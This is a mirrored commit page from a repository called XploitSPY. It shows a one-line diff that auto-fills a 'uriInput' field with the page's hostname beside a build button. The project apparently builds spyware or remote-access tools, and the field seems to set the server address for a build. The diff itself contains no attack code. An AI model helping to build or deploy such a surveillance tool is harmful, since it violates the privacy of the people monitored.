mirror of
https://github.com/XploitWizer-Community/XploitSPY.git
synced 2024-12-30 01:25:38 +08:00
Auto detect hostname
This commit is contained in:
parent
9b7c864d19
commit
86b867d366
@ -65,6 +65,8 @@
|
|||||||
"Finalizing"
|
"Finalizing"
|
||||||
];
|
];
|
||||||
|
|
||||||
|
document.getElementById('uriInput').value = window.location.hostname;
|
||||||
|
|
||||||
var loadingIndex = 0;
|
var loadingIndex = 0;
|
||||||
var isDone = false;
|
var isDone = false;
|
||||||
$('#gobuild').click((e) => {
|
$('#gobuild').click((e) => {
|
||||||
|
Loading…
Reference in New Issue
Block a user